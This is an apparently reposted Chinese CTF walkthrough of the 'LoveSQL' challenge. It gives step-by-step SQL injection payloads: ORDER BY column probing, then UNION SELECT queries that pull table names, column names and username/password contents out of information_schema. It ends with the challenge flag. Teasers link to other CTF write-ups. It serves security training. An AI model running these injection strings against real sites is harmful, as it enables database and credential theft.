[极客大挑战 2019]LoveSQL 1

这篇具有很好参考价值的文章主要介绍了[极客大挑战 2019]LoveSQL 1。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

题目环境:
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql判断注入类型
是否为数字型注入

admin
1

回显结果
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql

是否为字符型注入

admin
1'

回显结果
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql

判断注入手法类型

使用堆叠注入
采用密码参数进行注入

爆数据库
1'; show database();#
回显结果
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql

这里猜测注入语句某字段被过滤,或者是’;'被过滤导致不能堆叠注入

爆字段数
1';order by 4#
回显结果
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql

报错
抛弃堆叠注入

步入正题
1' order by 4#
回显结果
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql

成功,但是不存在第4列
同时验证了猜想不能使用堆叠注入

继续判断列数
1' order by 3#
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql

可知列数只有3列

爆数据库
使用联合查询
1' union select 1,2,database()#
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql
爆数据表
1' union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database()#
回显结果
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql

爆出两个表
开始爆数据表的字段
按照先后顺序把,先爆第一个

爆geekuser数据表的字段
1' union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='geekuser'#
回显结果
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql

字段:id、username、password

爆geekuser数据表的所有内容
1' union select 1,database(),group_concat(id,username,password) from geekuser#
回显结果
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql

无flag

转手数据表l0ve1ysq1
步骤和数据表geekuser一样,这里直接爆数据表l0ve1ysq1的flag值
1' union select 1,database(),group_concat(password) from l0ve1ysq1#
回显结果
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql
[极客大挑战 2019]LoveSQL 1,CTF做题笔记,数据库,服务器,运维,网络安全,web安全,sql
得出flag:
flag{3c4b1ff9-6685-4dcb-853e-06093c1e4040}文章来源地址https://www.toymoban.com/news/detail-744011.html

到了这里,关于[极客大挑战 2019]LoveSQL 1的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [极客大挑战 2019]FinalSQL(bypass盲注)

    这里是数字型注入,选择一个序号 这里过滤了很多东西 使用fuzzSQL字典,这是我自己定义编写的一个fuzz字典,内容较少 使用bp加载字典进行测试 看出被拦截的相应大小为890,那么之外的就是没有被拦截的 空格被过滤了,这里使用 ^ 来计算是否为数字注入 通过测试可以

    2024年02月09日
    浏览(42)
  • [极客大挑战 2019]PHP1-超详细

    [极客大挑战 2019]PHP1 提示:有一个良好的备份网站的习惯 寻找一个备份文件字典,我在github上找的: scopion/dic: 渗透字典,框架信息泄露,备份文件泄露,配置文件泄露。字典 (github.com) 我用的是top7777.txt字典,扫的很慢。 扫出来www.zip这个文件,然后下载下来 ,里面只有in

    2023年04月08日
    浏览(35)
  • BUUCTF [极客大挑战 2019]BuyFlag1

    进入靶场,发现有 另一个buyflag页面 告诉我们如果要买flag,必须是cuit的学生,必须有正确的密码,查看源码,发现密码已经告诉我们  这里涉及post传递两个参数money和password,is_numeric的绕过 和password==404的弱比较,通过burpsuite抓包  这里有个cookie:user=0猜测cuit学生的cookie是

    2023年04月14日
    浏览(39)
  • BUUCTF [极客大挑战 2019]Knife1

     连接蚁剑,连接密码为Syc 在 / 文件夹下找到flag文件 打开得到flag

    2024年02月09日
    浏览(38)
  • 攻防世界ctf题目easyupload做题笔记。

    刚刷完upload-labs靶场,做做ctf题目,发现自己掌握的知识并不牢固。做了半天没有解出来,最后还是看别人的题解做出来的。写下做题过程,也就是wp吧。为了方便以后复习巩固。 本题的主要考点为利用fastcgi的.user.ini特性进行任意命令执行 这里需要绕过的点如下 检查文件内

    2024年02月01日
    浏览(41)
  • 2019系统架构案例分析(试题+答案+做题技巧)

    某电子商务公司为了更好地管理用户,提升企业销售业绩,拟开发一套用户管理系统。该系统的基本功能是根据用户的消费级别、消费历史、信用情况等指标将用户划分为不同的等级,并针对不同等级的用户提供相应的折扣方案。在需求分析与架构设计阶段,电子商务公司提

    2024年02月08日
    浏览(34)
  • [GUET-CTF2019]re

    2024年02月06日
    浏览(32)
  • IAM风险CTF挑战赛

    wiz启动了一个名为“The Big IAM Challenge”云安全CTF挑战赛。旨在让白帽子识别和利用 IAM错误配置,并从现实场景中学习,从而更好的认识和了解IAM相关的风险。比赛包括6个场景,每个场景都专注于各种AWS服务中常见的IAM配置错误。 Challenge1: Buckets of Fun We all know that public bucket

    2024年02月11日
    浏览(39)
  • [CTFTraining] ASIS CTF 2019 Quals Unicorn shop

    阿米尔卡比尔大学信息安全与密码学研究小组夺旗赛 ​ 我们随便买一件商品,1~3都显示: ​ 只有第4个显示: ​ 只允许输入一个字符,题目叫 Unicorn ,猜测为 Unicode 。在Unicode - Compart搜索比千大的 Unicode 码: ​ 最后填进去买下商品得到flag。 另外:

    2024年02月07日
    浏览(95)
  • [ CTF ]【天格】战队WriteUp-第七届“强网杯”全国安全挑战赛

    第七届“强网杯”全国安全挑战赛 2023.12.16~2023.12.17 nc连接后我们先来看看 ​ 分析一下: ​ 主要目的是创建一个安全的环境,让用户在其中执行他们的代码,同时防止他们执行可能会破坏系统或获取敏感信息的代码。 首先导入了一些Python模块,如 code , os , subprocess 和 pty ,

    2024年02月04日
    浏览(43)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包